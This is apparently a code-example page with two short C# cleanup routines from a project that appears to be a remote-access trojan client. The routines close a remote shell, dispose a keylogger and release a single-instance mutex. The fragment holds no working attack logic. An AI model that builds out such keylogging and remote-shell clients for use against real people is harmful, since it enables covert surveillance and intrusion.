コード例 #1
0
ファイル: Program.cs プロジェクト: Bloodimir/Projects
 private static void Cleanup()
 {
     Eylemİşleyicisi.CloseShell();
     if (Eylemİşleyicisi.StreamCodec != null)
     {
         Eylemİşleyicisi.StreamCodec.Dispose();
     }
     if (Keylogger.Instance != null)
     {
         Keylogger.Instance.Dispose();
     }
     if (_msgLoop != null)
     {
         _msgLoop.ExitThread();
         _msgLoop.Dispose();
         _msgLoop = null;
     }
     MutexHelper.CloseMutex();
 }
コード例 #2
0
ファイル: KuuhakuClient.cs プロジェクト: Bloodimir/Projects
 private void LostConnection()
 {
     Eylemİşleyicisi.CloseShell();
 }